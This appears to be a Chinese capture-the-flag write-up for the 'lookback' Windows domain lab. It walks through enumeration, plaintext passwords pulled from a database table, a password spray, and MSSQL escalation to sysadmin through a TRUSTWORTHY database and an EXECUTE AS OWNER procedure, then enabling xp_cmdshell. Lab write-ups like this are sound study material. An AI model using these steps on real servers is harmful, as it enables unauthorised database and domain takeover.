靶机信息

详情

靶机：lookback
作者：wackymaker (QQ: 3456458902)
靶机ID: 632
系统：Windows（ad）
难度：hard
链接：https://mega.nz/file/GxgggYIR#T4gVR6wA9A3zy7r9qzo0gzxAzgIHI-_yURnsng-4tNw↗
链接：https://pan.baidu.com/s/1fpP1MyMAyyxe1hLrBG_LGg?pwd=7qgb↗
初始凭证：hank\HrUhoX2r6c7Jgxg2qiTY

启动（失败）

配置

彻底关机 **lookback**
在 **Storage** 里只做删除，不做新增
找到 **NVMe Controller** 下的 **lookback-disk1.vdi**
点“Remove Attachment”
保存
重新打开设置，确认 **NVMe** 下已经空了
再把这块盘添加到 **SATA Controller -> Port 0**

IP地址

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# arp-scan --interface=eth1 --localnet | grep "08:00:27"
3
172.16.55.128   08:00:27:2f:a0:3b       PCS Systemtechnik GmbH

信息收集

rustscan

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# rustscan -a 172.16.55.128 -- -A
3
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
4
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
5
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
6
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
7
The Modern Day Port Scanner.
8
________________________________________
9
: http://discord.skerritt.blog         :
10
: https://github.com/RustScan/RustScan :
11
 --------------------------------------
12
RustScan: Where '404 Not Found' meets '200 OK'.
13

14
[~] The config file is expected to be at "/root/.rustscan.toml"
15
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
16
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
17
Open 172.16.55.128:445
18
Open 172.16.55.128:1433

同步时间

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# nmap -p 445 --script smb2-time 172.16.55.128
3
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-11 13:40 +0800
4
Nmap scan report for dc01.lookback.htb (172.16.55.128)
5
Host is up (0.00027s latency).
6

7
PORT    STATE SERVICE
8
445/tcp open  microsoft-ds
9
MAC Address: 08:00:27:2F:A0:3B (Oracle VirtualBox virtual NIC)
10

11
Host script results:
12
| smb2-time:
13
|   date: 2026-04-11T06:01:38
14
|_  start_date: N/A
15

16
Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds

1
sudo timedatectl set-timezone UTC
2
sudo date -s "2026-04-11 06:01:38"

enum4linux-ng

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# rustscan -a 172.16.55.128 -- -A
3
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
4
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
5
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
6
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
7
The Modern Day Port Scanner.
8
________________________________________
9
: http://discord.skerritt.blog         :
10
: https://github.com/RustScan/RustScan :
11
 --------------------------------------
12
RustScan: Where '404 Not Found' meets '200 OK'.
13

14
[~] The config file is expected to be at "/root/.rustscan.toml"
15
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
16
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
17
Open 172.16.55.128:445
18
Open 172.16.55.128:1433
19
[~] Starting Script(s)
20
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 172.16.55.128
21
Depending on the complexity of the script, results may take some time to appear.
22
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-11 11:47 +0800
23
NSE: Loaded 158 scripts for scanning.
24
NSE: Script Pre-scanning.
25
NSE: Starting runlevel 1 (of 3) scan.
26
Initiating NSE at 11:47
27
Completed NSE at 11:47, 0.00s elapsed
28
NSE: Starting runlevel 2 (of 3) scan.
29
Initiating NSE at 11:47
30
Completed NSE at 11:47, 0.00s elapsed
31
NSE: Starting runlevel 3 (of 3) scan.
32
Initiating NSE at 11:47
33
Completed NSE at 11:47, 0.00s elapsed
34
Initiating ARP Ping Scan at 11:47
35
Scanning 172.16.55.128 [1 port]
36
Completed ARP Ping Scan at 11:47, 0.05s elapsed (1 total hosts)
37
Initiating Parallel DNS resolution of 1 host. at 11:47
38
Completed Parallel DNS resolution of 1 host. at 11:47, 4.50s elapsed
39
DNS resolution of 1 IPs took 4.50s. Mode: Async [#: 3, OK: 0, NX: 0, DR: 1, SF: 0, TR: 6, CN: 0]
40
Initiating SYN Stealth Scan at 11:47
41
Scanning 172.16.55.128 [2 ports]
42
Discovered open port 445/tcp on 172.16.55.128
43
Discovered open port 1433/tcp on 172.16.55.128
44
Completed SYN Stealth Scan at 11:47, 0.01s elapsed (2 total ports)
45
Initiating Service scan at 11:47
46
Scanning 2 services on 172.16.55.128
47
Completed Service scan at 11:47, 6.02s elapsed (2 services on 1 host)
48
Initiating OS detection (try #1) against 172.16.55.128
49
Retrying OS detection (try #2) against 172.16.55.128
50
NSE: Script scanning 172.16.55.128.
51
NSE: Starting runlevel 1 (of 3) scan.
52
Initiating NSE at 11:48
53
NSE Timing: About 99.65% done; ETC: 11:48 (0:00:00 remaining)
54
Completed NSE at 11:48, 40.04s elapsed
55
NSE: Starting runlevel 2 (of 3) scan.
56
Initiating NSE at 11:48
57
Completed NSE at 11:48, 0.05s elapsed
58
NSE: Starting runlevel 3 (of 3) scan.
59
Initiating NSE at 11:48
60
Completed NSE at 11:48, 0.00s elapsed
61
Nmap scan report for 172.16.55.128
62
Host is up, received arp-response (0.00036s latency).
63
Scanned at 2026-04-11 11:47:53 CST for 50s
64

65
PORT     STATE SERVICE       REASON          VERSION
66
445/tcp  open  microsoft-ds? syn-ack ttl 128
67
1433/tcp open  ms-sql-s      syn-ack ttl 128 Microsoft SQL Server 2022 16.00.1000.00; RTM
68
| ms-sql-ntlm-info:
69
|   172.16.55.128:1433:
70
|     Target_Name: LOOKBACK
71
|     NetBIOS_Domain_Name: LOOKBACK
72
|     NetBIOS_Computer_Name: DC01
73
|     DNS_Domain_Name: lookback.htb
74
|     DNS_Computer_Name: dc01.lookback.htb
75
|     DNS_Tree_Name: lookback.htb
76
|_    Product_Version: 10.0.20348
77
|_ssl-date: 2026-04-11T03:57:19+00:00; +8m36s from scanner time.
78
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
79
| Issuer: commonName=SSL_Self_Signed_Fallback
80
| Public Key type: rsa
81
| Public Key bits: 3072
82
| Signature Algorithm: sha256WithRSAEncryption
83
| Not valid before: 2026-04-11T03:52:01
84
| Not valid after:  2056-04-11T03:52:01
85
| MD5:     7474 440a 16ce 3fac dfe7 9c40 1237 c0fc
86
| SHA-1:   98b5 8200 df9f cf7c c7fa 7481 62b8 895c b5b8 4634
87
| SHA-256: 258a 88d1 3b16 1c42 a05e c7d7 ea41 b3da fee5 7ee2 cc7d dcb6 ee04 ae2f 5885 8c54
88
| -----BEGIN CERTIFICATE-----
89
| MIIEADCCAmigAwIBAgIQGm3HGZvOj5VCSzUQsQ5msDANBgkqhkiG9w0BAQsFADA7
90
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
91
| bABsAGIAYQBjAGswIBcNMjYwNDExMDM1MjAxWhgPMjA1NjA0MTEwMzUyMDFaMDsx
92
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
93
| AGwAYgBhAGMAazCCAaIwDQYJKoZIhvcNAQEBBQADggGPADCCAYoCggGBAPUHgbuD
94
| bBc5qBelr4X1WCI1KsW3GRBACa60P5AzaQwfTr2h0IdYNvurfgAmQtyvXjaPoJIT
95
| CJ4ssEQRJZ0wf6m7xsphUyBV3G2yPFNtYb7aPXv7qhKO4imjbeGVT638HZLYFMgs
96
| CTIsqIpP+910po23zNwZsEB6Y/vhAtx4aswg4RHV0SpB6dEVwNElsCEuQ5rFnZAu
97
| m3hRa/+lYCQHadfwEVG25RRWMSywSAz6hJ/4OlkWcXO15M4sZUefQWM5VE/xKeUc
98
| yVhEv2G7xTwnJ5vqWyxz+IvnibUc6WRUqZwQof1fyjey2fPGIAC/V27pNrnPvl1a
99
| mOUdZpVwI3Lt0CBvDMAIGKQoBnc4jtuBLde4JRtDuFJHTp+0H1MRypV1bFF6wfcW
100
| byu/mxmTNfQdPPct11lCEF22kWtmf/AVtW92N89uBlv46xiBoeepYjTyVFmGNBtm
101
| vdl4zopzGp0hF9lKaxDDGPJ/RBvE/bBlr/XgoEhkAZsNgmCGSIeSH0COLQIDAQAB
102
| MA0GCSqGSIb3DQEBCwUAA4IBgQCWBFp9iElHXo55braQc+d4qgg9qb773LOcW96R
103
| WUoKFRn+L5xH8pCSx1CS8iTs3aUa0S5xwtoCsRXGZIVSXqbaqBfyQSgtm3fJuGPH
104
| dPYz6h2P7KFJUOxBgdiH/xhL/7w8TTdq4x6X4V9q6gqXOEL33+ygV4lupiKCqXWh
105
| zfgOiXADf+1fwN6Kq3E6mkwA03K3s9bcAsu7GfmiKHx0nBIuNZMa2wup4rHp+kyT
106
| e5UNbvhtTn5nnbzWZgVoTJWxDTZgxqdh9o8pZquH0s5PH48Ze2qVZjavd3hyEX09
107
| I0I3O4kWqNqz8jhLM53OHR+fz1FHfLRfFSmAYPloFYZAw7/bTn6ERZNjBvRoRm7J
108
| M5E6WzdXd2AwFGUmcYdtdN2pW9T+0ki55L9qDOAcLCUMfYqEl2Au55IhNyyWJNgX
109
| leMTjln6ZLV/Yej/GieHtUlU5Q18hMHmzoMD3I68ig6BhmZVBtrlF028Pp67/z/z
110
| rqikA3uC/zht8YXVSceyw/EVr0Q=
111
|_-----END CERTIFICATE-----
112
| ms-sql-info:
113
|   172.16.55.128:1433:
114
|     Version:
115
|       name: Microsoft SQL Server 2022 RTM
116
|       number: 16.00.1000.00
117
|       Product: Microsoft SQL Server 2022
118
|       Service pack level: RTM
119
|       Post-SP patches applied: false
120
|_    TCP port: 1433
121
MAC Address: 08:00:27:2F:A0:3B (Oracle VirtualBox virtual NIC)
122
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
123
Device type: general purpose
124
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (92%)
125
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2016
126
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
127
Aggressive OS guesses: Microsoft Windows Server 2022 (92%), Microsoft Windows 11 21H2 (85%), Microsoft Windows Server 2016 (85%)
128
No exact OS matches for host (test conditions non-ideal).
129
TCP/IP fingerprint:
130
SCAN(V=7.98%E=4%D=4/11%OT=445%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=69D9C49B%P=x86_64-pc-linux-gnu)
131
SEQ(SP=F3%GCD=1%ISR=FB%TI=I%TS=A)
132
SEQ(SP=FF%GCD=1%ISR=10C%TI=I%TS=A)
133
OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)
134
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
135
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M5B4NW8NNS%CC=Y%Q=)
136
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
137
T2(R=N)
138
T3(R=N)
139
T4(R=N)
140
U1(R=N)
141
IE(R=N)
142

143
Uptime guess: 0.005 days (since Sat Apr 11 11:41:08 2026)
144
Network Distance: 1 hop
145
TCP Sequence Prediction: Difficulty=243 (Good luck!)
146
IP ID Sequence Generation: Incremental
147

148
Host script results:
149
| p2p-conficker:
150
|   Checking for Conficker.C or higher...
151
|   Check 1 (port 20036/tcp): CLEAN (Timeout)
152
|   Check 2 (port 63241/tcp): CLEAN (Timeout)
153
|   Check 3 (port 42841/udp): CLEAN (Timeout)
154
|   Check 4 (port 42527/udp): CLEAN (Timeout)
155
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
156
| smb2-security-mode:
157
|   3.1.1:
158
|_    Message signing enabled and required
159
| smb2-time:
160
|   date: 2026-04-11T03:56:38
161
|_  start_date: N/A
162
|_clock-skew: mean: 8m32s, deviation: 2s, median: 8m31s
163

164
TRACEROUTE
165
HOP RTT     ADDRESS
166
1   0.36 ms 172.16.55.128
167

168
NSE: Script Post-scanning.
169
NSE: Starting runlevel 1 (of 3) scan.
170
Initiating NSE at 11:48
171
Completed NSE at 11:48, 0.00s elapsed
172
NSE: Starting runlevel 2 (of 3) scan.
173
Initiating NSE at 11:48
174
Completed NSE at 11:48, 0.00s elapsed
175
NSE: Starting runlevel 3 (of 3) scan.
176
Initiating NSE at 11:48
177
Completed NSE at 11:48, 0.00s elapsed
178
Read data files from: /usr/share/nmap
179
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
180
Nmap done: 1 IP address (1 host up) scanned in 55.53 seconds
181
           Raw packets sent: 89 (9.036KB) | Rcvd: 17 (932B)

添加hosts

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# echo "172.16.55.128 dc01.lookback.htb lookback.htb dc01" | sudo tee -a /etc/hosts
3
172.16.55.128 dc01.lookback.htb lookback.htb dc01

netexec

smb(shares)

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# nxc smb 172.16.55.128 -d lookback.htb -u hank -p 'HrUhoX2r6c7Jgxg2qiTY' --shares
3
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
4
SMB         172.16.55.128   445    DC01             [+] lookback.htb\hank:HrUhoX2r6c7Jgxg2qiTY
5
SMB         172.16.55.128   445    DC01             [*] Enumerated shares
6
SMB         172.16.55.128   445    DC01             Share           Permissions     Remark
7
SMB         172.16.55.128   445    DC01             -----           -----------     ------
8
SMB         172.16.55.128   445    DC01             ADMIN$                          Remote Admin
9
SMB         172.16.55.128   445    DC01             C$                              Default share
10
SMB         172.16.55.128   445    DC01             IPC$            READ            Remote IPC
11
SMB         172.16.55.128   445    DC01             NETLOGON        READ            Logon server share
12
SMB         172.16.55.128   445    DC01             notes
13
SMB         172.16.55.128   445    DC01             SYSVOL          READ            Logon server share

smb(users)

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# nxc smb 172.16.55.128 -d lookback.htb -u hank -p 'HrUhoX2r6c7Jgxg2qiTY' --users
3
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
4
SMB         172.16.55.128   445    DC01             [+] lookback.htb\hank:HrUhoX2r6c7Jgxg2qiTY
5
SMB         172.16.55.128   445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
6
SMB         172.16.55.128   445    DC01             Administrator                 2025-10-17 18:08:02 0       Built-in account for administering the computer/domain
7
SMB         172.16.55.128   445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain
8
SMB         172.16.55.128   445    DC01             krbtgt                        2025-10-17 03:15:35 0       Key Distribution Center Service Account
9
SMB         172.16.55.128   445    DC01             hank                          2025-10-19 12:05:12 0
10
SMB         172.16.55.128   445    DC01             lookback-admin                2025-10-19 12:11:25 0
11
SMB         172.16.55.128   445    DC01             db-admin                      2025-10-19 12:15:44 0
12
SMB         172.16.55.128   445    DC01             Service_Maintainer            2025-10-19 13:27:26 0
13
SMB         172.16.55.128   445    DC01             IT-SEC-admin                  2025-10-19 14:11:48 0
14
SMB         172.16.55.128   445    DC01             IT-admin                      2025-10-19 14:15:17 0
15
SMB         172.16.55.128   445    DC01             IT-login-user                 2025-10-19 14:17:16 0
16
SMB         172.16.55.128   445    DC01             IT-email-admin                2025-10-19 14:20:21 0
17
SMB         172.16.55.128   445    DC01             [*] Enumerated 11 local users: LOOKBACK

mssql

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# nxc mssql 172.16.55.128 -d lookback.htb -u hank -p 'HrUhoX2r6c7Jgxg2qiTY'
3
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
4
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\hank:HrUhoX2r6c7Jgxg2qiTY

Mssql-1433

连接(hank)

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# impacket-mssqlclient 'lookback.htb/hank:HrUhoX2r6c7Jgxg2qiTY@172.16.55.128' -windows-auth
3
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
4

5
[*] Encryption required, switching to TLS
6
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
7
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
8
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
9
[*] INFO(dc01): Line 1: Changed database context to 'master'.
10
[*] INFO(dc01): Line 1: Changed language setting to us_english.
11
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
12
[!] Press help for extra shell commands
13
SQL (lookback\hank  guest@master)>

信息收集

enum-db

1
SQL (lookback\hank  guest@master)> enum_db
2
name       is_trustworthy_on
3
--------   -----------------
4
master                     0
5
tempdb                     0
6
model                      0
7
msdb                       1
8
lookback                   1
9
notes                      0

enum_logins

1
SQL (lookback\hank  guest@master)> enum_logins
2
name            type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin
3
-------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------
4
sa              SQL_LOGIN                 0          1               0             0            0              0           0           0           0
5
lookback\hank   WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0

权限查询

1
SQL (lookback\hank  guest@master)> SELECT SYSTEM_USER;
2

3
-------------
4
lookback\hank

1
SQL (lookback\hank  guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin');
2

3
-
4
0

1
SQL (lookback\hank  guest@master)> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
2
entity_name   subentity_name   permission_name
3
-----------   --------------   -----------------
4
server                         CONNECT SQL
5
server                         VIEW ANY DATABASE

1
SQL (lookback\hank  guest@master)> SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
2
entity_name   subentity_name   permission_name
3
-----------   --------------   -----------------------------------------
4
database                       CONNECT
5
database                       VIEW ANY COLUMN ENCRYPTION KEY DEFINITION
6
database                       VIEW ANY COLUMN MASTER KEY DEFINITION

Note数据库

尝试密码喷洒都失败了
经与前文smb(users)的比对确定lookback_admin应为lookback-admin

1
SQL (lookback\hank  LOOKBACK\hank@notes)> SELECT name FROM sys.tables;
2
name
3
-----------
4
users_notes
5
SQL (lookback\hank  LOOKBACK\hank@notes)> SELECT * FROM notes.dbo.users_notes;
6
id   username            password
7
--   -----------------   ------------------------------------------------------------------------------
8
 1   Update Notice       Due to multiple weak passwords, strong password accounts are now being issued.
9
 2   jacob               G4vK1sZq9pH7tR2L
10
 3   www_data            Q8mP2cV7xN3yJ5S0
11
 4   Administrator       Z2pL6wF9rT5bC3K1
12
 5   mssqlsvc            H5kR3nV8qW1tM7X2
13
 6   signed_IT           U7qF2bY9mC4pL1T6
14
 7   wack_admin          N6vT4pR8sK1qZ3H0
15
 8   lan                 P3rM9tW2kV7xL5C1
16
 9   user_roundcube      F8kJ2vN6qR4pT1Z3
17
10   user                Y1pL7nK3vR9tC5M2
18
11   stow_svc            D4qV8mP2rT6kN1S9
19
12   ch_user             L9rT3pF6vK1nM8Q2
20
13   rustkey             C2pN7qR5vT9kL3H1
21
14   outbound_user       S6kP1vR9tM4qN2Z8
22
15   lookback_migrator   B7qR2pT6vN1kM9C4
23
16   lookback_admin      iPmmhn8bguFcWin9

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# nxc smb 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9'
3

4
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
5
SMB         172.16.55.128   445    DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9
6

7
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
8
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9'
9
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
10
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9

users.txt

1
jacob
2
www_data
3
Administrator
4
mssqlsvc
5
signed_IT
6
wack_admin
7
lan
8
user_roundcube
9
user
10
stow_svc
11
ch_user
12
rustkey
13
outbound_user
14
lookback_migrator
15
lookback_admin

passwords.txt

1
G4vK1sZq9pH7tR2L
2
Q8mP2cV7xN3yJ5S0
3
Z2pL6wF9rT5bC3K1
4
H5kR3nV8qW1tM7X2
5
U7qF2bY9mC4pL1T6
6
N6vT4pR8sK1qZ3H0
7
P3rM9tW2kV7xL5C1
8
F8kJ2vN6qR4pT1Z3
9
Y1pL7nK3vR9tC5M2
10
D4qV8mP2rT6kN1S9
11
L9rT3pF6vK1nM8Q2
12
C2pN7qR5vT9kL3H1
13
S6kP1vR9tM4qN2Z8
14
B7qR2pT6vN1kM9C4
15
iPmmhn8bguFcWin9

netexec-密码喷洒

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# nxc smb 172.16.55.128 -d lookback.htb -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
3
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
4
SMB         172.16.55.128   445    DC01             [-] lookback.htb\jacob:G4vK1sZq9pH7tR2L STATUS_LOGON_FAILURE
5
SMB         172.16.55.128   445    DC01             [-] lookback.htb\www_data:Q8mP2cV7xN3yJ5S0 STATUS_LOGON_FAILURE
6
SMB         172.16.55.128   445    DC01             [-] lookback.htb\Administrator:Z2pL6wF9rT5bC3K1 STATUS_LOGON_FAILURE
7
SMB         172.16.55.128   445    DC01             [-] lookback.htb\mssqlsvc:H5kR3nV8qW1tM7X2 STATUS_LOGON_FAILURE
8
SMB         172.16.55.128   445    DC01             [-] lookback.htb\signed_IT:U7qF2bY9mC4pL1T6 STATUS_LOGON_FAILURE
9
SMB         172.16.55.128   445    DC01             [-] lookback.htb\wack_admin:N6vT4pR8sK1qZ3H0 STATUS_LOGON_FAILURE
10
SMB         172.16.55.128   445    DC01             [-] lookback.htb\lan:P3rM9tW2kV7xL5C1 STATUS_LOGON_FAILURE
11
SMB         172.16.55.128   445    DC01             [-] lookback.htb\user_roundcube:F8kJ2vN6qR4pT1Z3 STATUS_LOGON_FAILURE
12
SMB         172.16.55.128   445    DC01             [-] lookback.htb\user:Y1pL7nK3vR9tC5M2 STATUS_LOGON_FAILURE
13
SMB         172.16.55.128   445    DC01             [-] lookback.htb\stow_svc:D4qV8mP2rT6kN1S9 STATUS_LOGON_FAILURE
14
SMB         172.16.55.128   445    DC01             [-] lookback.htb\ch_user:L9rT3pF6vK1nM8Q2 STATUS_LOGON_FAILURE
15
SMB         172.16.55.128   445    DC01             [-] lookback.htb\rustkey:C2pN7qR5vT9kL3H1 STATUS_LOGON_FAILURE
16
SMB         172.16.55.128   445    DC01             [-] lookback.htb\outbound_user:S6kP1vR9tM4qN2Z8 STATUS_LOGON_FAILURE
17
SMB         172.16.55.128   445    DC01             [-] lookback.htb\lookback_migrator:B7qR2pT6vN1kM9C4 STATUS_LOGON_FAILURE
18
SMB         172.16.55.128   445    DC01             [-] lookback.htb\lookback_admin:iPmmhn8bguFcWin9 STATUS_LOGON_FAILURE

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# nxc smb 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9'
3

4
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
5
SMB         172.16.55.128   445    DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9
6

7
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
8
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9'
9
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
10
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9

连接(lookback-admin)

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# impacket-mssqlclient 'lookback.htb/lookback-admin:iPmmhn8bguFcWin9@172.16.55.128' -windows-auth
3
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
4

5
[*] Encryption required, switching to TLS
6
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
7
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
8
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
9
[*] INFO(dc01): Line 1: Changed database context to 'master'.
10
[*] INFO(dc01): Line 1: Changed language setting to us_english.
11
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
12
[!] Press help for extra shell commands
13
SQL (lookback\lookback-admin  guest@master)>

信息收集

enum-db

1
SQL (lookback\lookback-admin  guest@master)> enum_db
2
name       is_trustworthy_on
3
--------   -----------------
4
master                     0
5
tempdb                     0
6
model                      0
7
msdb                       1
8
lookback                   1
9
notes                      0

enum_logins

1
SQL (lookback\lookback-admin  guest@master)> enum_logins
2
name                      type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin
3
-----------------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------
4
sa                        SQL_LOGIN                 0          1               0             0            0              0           0           0           0
5
lookback\lookback-admin   WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0

权限查询

1
SQL (lookback\lookback-admin  guest@master)> SELECT SYSTEM_USER;
2

3
-----------------------
4
lookback\lookback-admin

1
SQL (lookback\lookback-admin  guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin');
2

3
-
4
0

1
SQL (lookback\lookback-admin  guest@master)> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
2
entity_name   subentity_name   permission_name
3
-----------   --------------   -----------------
4
server                         CONNECT SQL
5
server                         VIEW ANY DATABASE

1
SQL (lookback\lookback-admin  guest@master)> SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
2
entity_name   subentity_name   permission_name
3
-----------   --------------   -----------------------------------------
4
database                       CONNECT
5
database                       VIEW ANY COLUMN ENCRYPTION KEY DEFINITION
6
database                       VIEW ANY COLUMN MASTER KEY DEFINITION

权限提升

前置条件

`EXECUTE AS OWNER` 提权

TRUSTWORTHY 属性允许数据库内的模拟（Impersonation）上下文跨越数据库边界。
结合另一个条件：如果数据库的所有者是高权限登录名（比如 sa），那么在该数据库内创建一个 EXECUTE AS OWNER 的存储过程，执行时就会以 **sa** 的权限级别运行

1
enum_db  --> lookback 数据库 is_trustworthy_on = 1

数据库所有者

1
SQL (lookback\hank  guest@msdb)> SELECT name, SUSER_SNAME(owner_sid) AS owner FROM sys.databases WHERE name = 'lookback';
2
name       owner
3
--------   ----------------------
4
lookback   LOOKBACK\Administrator

exploit

步骤 1：进入 `lookback` 数据库

1
SQL (lookback\lookback-admin  guest@master)> USE lookback;
2
ENVCHANGE(DATABASE): Old Value: master, New Value: lookback
3
INFO(dc01): Line 1: Changed database context to 'lookback'.

步骤 2：创建提权存储过程

1
SQL (lookback\lookback-admin  lookback\lookback-admin@lookback)> CREATE OR ALTER PROCEDURE dbo.privesc WITH EXECUTE AS OWNER AS BEGIN ALTER SERVER ROLE [sysadmin] ADD MEMBER [LOOKBACK\lookback-admin]; END;

步骤 3：执行存储过程

1
SQL (lookback\lookback-admin  lookback\lookback-admin@lookback)> EXEC dbo.privesc;

步骤 4：验证是否成功

1
SQL (lookback\lookback-admin  dbo@lookback)> SELECT IS_SRVROLEMEMBER('sysadmin');
2

3
-
4
1

若返回 1，则说明已成功加入 sysadmin 角色。

步骤 5：启用 `xp_cmdshell` 并执行命令

1
SQL (lookback\lookback-admin  dbo@lookback)> EXEC sp_configure 'show advanced options', 1;
2
INFO(dc01): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
3
SQL (lookback\lookback-admin  dbo@lookback)> RECONFIGURE;
4
SQL (lookback\lookback-admin  dbo@lookback)> EXEC sp_configure 'xp_cmdshell', 1;
5
INFO(dc01): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
6
SQL (lookback\lookback-admin  dbo@lookback)> RECONFIGURE;
7
